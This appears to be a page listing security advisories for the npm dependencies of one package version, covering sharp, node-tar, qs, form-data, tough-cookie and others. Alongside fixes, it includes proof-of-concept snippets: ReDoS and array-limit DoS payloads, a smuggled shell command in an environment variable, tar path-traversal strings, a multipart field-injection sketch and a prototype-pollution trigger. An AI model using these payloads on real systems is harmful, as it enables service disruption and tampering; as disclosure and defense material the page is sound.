All vulnerabilities related to version 0.4.1 of the package
Uncontrolled Resource Consumption in trim-newlines
The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end() method.
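As a rough timing sketch of the behaviour (assuming a vulnerable trim-newlines, i.e. before 3.0.1, is installed; the payload shape is an assumption, not the advisory's exact reproducer):
const trimNewlines = require('trim-newlines');

// A long run of newline characters that does not terminate the string forces
// the end-anchored regex to re-scan from every position before failing.
const payload = '\r'.repeat(50000) + 'x';

console.time('trimNewlines.end');
trimNewlines.end(payload); // noticeably slow on vulnerable versions
console.timeEnd('trimNewlines.end');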
sharp vulnerability in libwebp dependency CVE-2023-4863
sharp uses libwebp to decode WebP images, and versions prior to the latest 0.32.6 are vulnerable to the high-severity https://github.com/advisories/GHSA-j7hp-h8jx-5ppr.
Almost anyone processing untrusted input with versions of sharp prior to 0.32.6 is affected.
Most people rely on the prebuilt binaries provided by sharp; please upgrade sharp to the latest 0.32.6, which provides libwebp 1.3.2.
If you are using a custom, globally-installed libvips, please ensure you are using the latest libwebp 1.3.2.
Add the following to your code to prevent sharp from decoding WebP images.
sharp.block({ operation: ["VipsForeignLoadWebp"] });
sharp vulnerable to Command Injection in post-installation over build environment
There's a possible vulnerability in logic that is run only at npm install time when installing versions of sharp prior to the latest v0.30.5.
This is not part of any runtime code, does not affect Windows users at all, and is unlikely to affect anyone that already cares about the security of their build environment. However, out of an abundance of caution, I've created this advisory.
If an attacker has the ability to set the value of the PKG_CONFIG_PATH environment variable in a build environment then they might be able to use this to inject an arbitrary command at npm install time.
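As a simplified sketch of this class of problem (this is not sharp's actual install code; the pkg-config invocation shown is illustrative):
const { execSync } = require('child_process');

// Vulnerable pattern: interpolating an environment variable into a shell
// command string. A value such as $(touch /tmp/pwned) is executed by the
// shell via command substitution, even inside double quotes.
const flags = execSync(
  'PKG_CONFIG_PATH="' + process.env.PKG_CONFIG_PATH + '" pkg-config --cflags vips-cpp'
).toString();

// Safer pattern: keep the variable out of the command string entirely and
// pass it via the env option instead.
const safeFlags = execSync('pkg-config --cflags vips-cpp', {
  env: { ...process.env }
}).toString();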
I've used the Common Vulnerability Scoring System (CVSS) calculator to determine the maximum possible impact, which suggests a "medium" score of 5.9, but for most people the real impact will be dealing with the noise from automated security tooling that this advisory will bring.
This problem was fixed in commit a6aeef6 and published as part of sharp v0.30.5.
Thank you very much to @dwisiswant0 for the responsible disclosure.
Remember: if an attacker has control over environment variables in your build environment then you have a bigger problem to deal with than this issue.
Arbitrary File Creation/Overwrite due to insufficient absolute path sanitization
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the preservePaths flag is not set to true. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example /home/user/.bashrc would turn into home/user/.bashrc.
This logic was insufficient when file paths contained repeated path roots such as ////home/user/.bashrc. node-tar would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. ///home/user/.bashrc) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite.
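A sketch of the flawed logic (this is not node-tar's exact code), showing why stripping a single path root is insufficient:
const path = require('path')

// Approximation of the old behaviour: strip one leading '/' only.
const entryPath = '////home/user/.bashrc'
const stripped = entryPath.replace(/^\//, '')

console.log(stripped)                  // '///home/user/.bashrc'
console.log(path.isAbsolute(stripped)) // true -- still resolves outside the target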
Patched versions: 3.2.2 || 4.4.14 || 5.0.6 || 6.1.1
NOTE: an adjacent issue CVE-2021-32803 affects this release level. Please ensure you update to the latest patch levels that address CVE-2021-32803 as well if this adjacent issue affects your node-tar use case.
Users may work around this vulnerability without upgrading by creating a custom onentry method which sanitizes the entry.path or a filter method which removes entries with absolute paths.
const path = require('path')
const tar = require('tar')

tar.x({
  file: 'archive.tgz',
  // either add this function...
  onentry: (entry) => {
    if (path.isAbsolute(entry.path)) {
      entry.path = sanitizeAbsolutePathSomehow(entry.path)
      entry.absolute = path.resolve(entry.path)
    }
  },
  // or this one
  filter: (file, entry) => {
    if (path.isAbsolute(entry.path)) {
      return false
    } else {
      return true
    }
  }
})
Users are encouraged to upgrade to the latest patch versions, rather than attempt to sanitize tar input themselves.
Arbitrary File Creation/Overwrite on Windows via insufficient relative path sanitization
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted. This is, in part, accomplished by sanitizing absolute paths of entries within the archive, skipping archive entries that contain .. path portions, and resolving the sanitized paths against the extraction target directory.
This logic was insufficient on Windows systems when extracting tar files that contained a path that was not an absolute path, but specified a drive letter different from the extraction target, such as C:some\path. If the drive letter does not match the extraction target, for example D:\extraction\dir, then the result of path.resolve(extractionDirectory, entryPath) would resolve against the current working directory on the C: drive, rather than the extraction target directory.
Additionally, a .. portion of the path could occur immediately after the drive letter, such as C:../foo, and was not properly sanitized by the logic that checked for .. within the normalized and split portions of the path.
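Both behaviours can be seen with Node's win32 path implementation (a sketch; exact output depends on the process's current directory on each drive):
const path = require('path').win32

// A drive-relative path resolves against the current directory on C:,
// not against the extraction target on D:.
console.log(path.resolve('D:\\extraction\\dir', 'C:some\\path'))
// e.g. 'C:\\Users\\victim\\some\\path'

// '..' hidden behind the drive letter survives normalization as 'C:..',
// so a check for '..' path portions misses it.
console.log(path.normalize('C:../foo')) // 'C:..\\foo'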
This only affects users of node-tar on Windows systems.
Patched versions: 4.4.18 || 5.0.10 || 6.1.9
There is no reasonable way to work around this issue without performing the same path normalization procedures that node-tar now does.
Users are encouraged to upgrade to the latest patched versions of node-tar, rather than attempt to sanitize paths themselves.
The fixed versions strip path roots from all paths prior to being resolved against the extraction target folder, even if such paths are not "absolute".
Additionally, a path starting with a drive letter and then two dots, like c:../, would bypass the check for .. path portions. This is checked properly in the patched versions.
Finally, a defense-in-depth check is added, such that if the entry.absolute is outside of the extraction target, and we are not in preservePaths:true mode, a warning is raised on that entry, and it is skipped. Currently, it is believed that this check is redundant, but it did catch some oversights in development.
Denial of service while parsing a tar file due to lack of folders count validation
During some analysis today on npm's node-tar package, I came across the folder creation process. Basically, if you provide node-tar with a path like ./a/b/c/foo.txt, it creates every folder and sub-folder here (a, b, and c) until it reaches the last folder and creates foo.txt. I noticed that there is no validation at all on the number of folders being created, which means we are actually able to consume the CPU and memory of the system running node-tar, and even crash the Node.js client within a few seconds, by using a path with too many sub-folders inside.
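As a rough sketch of the kind of entry path involved (the actual archive is the one attached in the resources; the component count here is an assumption):
// Every '/'-separated component below becomes a directory creation during
// extraction in vulnerable versions -- there is no cap on the count.
const components = 500000
const deepPath = Array.from({ length: components }, () => 'a').join('/') + '/foo.txt'
console.log(deepPath.length) // roughly 1 MB of path for a single tiny entry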
You can reproduce this issue by downloading the tar file I provided in the resources and using node-tar to extract it; you should get the same behavior as in the video.
Here's a video showcasing the exploit:
Impact: denial of service by crashing the Node.js client when attempting to parse a tar archive, making it run out of heap memory and consuming the server's CPU and memory resources.
This report was originally submitted to GitHub's bug bounty program, which asked me to report it to you a month ago.
Regular Expression Denial of Service (ReDoS)
In the npm package color-string, there is a ReDoS (Regular Expression Denial of Service) vulnerability involving exponential time complexity for linearly increasing input lengths of hwb() color strings.
Strings reaching more than 5000 characters would see several milliseconds of processing time; strings reaching more than 50,000 characters began seeing 1500ms (1.5s) of processing time.
The cause was the regular expression that parses hwb() strings - specifically, the hue value - where the integer portion of the hue value used a 0-or-more quantifier followed shortly thereafter by a 1-or-more quantifier.
This caused excessive backtracking and a cartesian scan, resulting in exponential time complexity given a linear increase in input length.
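A minimal timing sketch (assuming a vulnerable color-string is installed; the payload shape - a long digit run in the hue position followed by an invalid suffix that forces the match to fail - is an assumption, not the advisory's exact reproducer):
const colorString = require('color-string');

// Long digit run where the hue value is parsed, then a character that makes
// the overall match fail, forcing backtracking across the overlapping
// 0-or-more and 1-or-more quantifiers.
const payload = 'hwb(' + '1'.repeat(50000) + '!, 0%, 0%)';

console.time('colorString.get');
colorString.get(payload); // returns null either way; slow only when vulnerable
console.timeEnd('colorString.get');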
Server-Side Request Forgery in Request
The request package through 2.88.2 for Node.js and the @cypress/request package prior to 3.0.0 allow a bypass of SSRF mitigations via an attacker-controlled server that performs a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).
NOTE: The request package is no longer supported by the maintainer.
qs's arrayLimit bypass in its bracket notation allows DoS via memory exhaustion
The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.
The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).
Vulnerable code (lib/parse.js:159-162):
if (root === '[]' && options.parseArrays) {
    obj = utils.combine([], leaf); // No arrayLimit check
}
Working code (lib/parse.js:175):
else if (index <= options.arrayLimit) { // Limit checked here
    obj = [];
    obj[index] = leaf;
}
The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.
Test 1 - Basic bypass:
npm install qs
const qs = require('qs');
const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
console.log(result.a.length); // Output: 6 (should be max 5)
Test 2 - DoS demonstration:
const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length); // Output: 10000 (should be max 100)
Configuration:
arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
Payload: a[]=value (not indexed a[0]=value)
Impact: Denial of service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.
Attack scenario:
GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
qs.parse(query, { arrayLimit: 100 })
Real-world impact:
Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.
Current code (lib/parse.js:159-162):
if (root === '[]' && options.parseArrays) {
    obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
        ? []
        : utils.combine([], leaf); // No arrayLimit check
}
Fixed code:
if (root === '[]' && options.parseArrays) {
    // Use currentArrayLength already calculated at line 147-151
    if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
        throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
    }
    // If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)
    if (currentArrayLength >= options.arrayLimit) {
        obj = options.plainObjects ? { __proto__: null } : {};
        obj[currentArrayLength] = leaf;
    } else {
        obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
            ? []
            : utils.combine([], leaf);
    }
}
This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).
form-data uses an unsafe random function for choosing the multipart boundary
form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker can observe or predict those random values, under the conditions described below.
Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, including those used to generate form-data's boundary value. This allows the attacker to craft a value that contains the boundary value, allowing them to inject additional parameters into the request.
This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.
The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347
An attacker who is able to predict the output of Math.random() can predict this boundary value and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application in order to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself: if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook, the attacker can observe the boundary values from those requests to recover the Math.random() outputs). A common example would be an x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend, and Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose).
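To make the mechanics concrete, a hypothetical sketch of the injection (predictBoundary() is not a real API -- it stands in for the PRNG-state-recovery step -- and the injected field name and value are illustrative):
// Attacker has recovered the Math.random() state and predicted the boundary
// string form-data will generate next.
const boundary = predictBoundary(); // hypothetical helper

// User-controlled field value that smuggles an extra, attacker-chosen field.
const malicious =
  'innocent value\r\n' +
  '--' + boundary + '\r\n' +
  'Content-Disposition: form-data; name="role"\r\n' +
  '\r\n' +
  'admin';

// When form-data serializes this value with the predicted boundary, the
// receiving multipart parser sees an additional field: role=admin.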
PoC here: https://github.com/benweissmann/CVE-2025-7783-poc
Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).
For an application to be vulnerable, it must use form-data to send data, including user-controlled data, to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array). If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.
tough-cookie Prototype Pollution vulnerability
Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.
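A minimal sketch based on the publicly documented proof of concept (assuming a vulnerable tough-cookie, i.e. before 4.1.3):
const tough = require('tough-cookie');

// rejectPublicSuffixes: false allows a cookie to declare Domain=__proto__.
const jar = new tough.CookieJar(undefined, { rejectPublicSuffixes: false });
jar.setCookieSync(
  'Slonser=polluted; Domain=__proto__; Path=/notauth',
  'https://__proto__/admin'
);

// In vulnerable versions the cookie index is a plain object, so the entry
// above lands on Object.prototype and leaks into every object.
const probe = {};
console.log(probe['/notauth']); // an object on vulnerable versions, undefined on >= 4.1.3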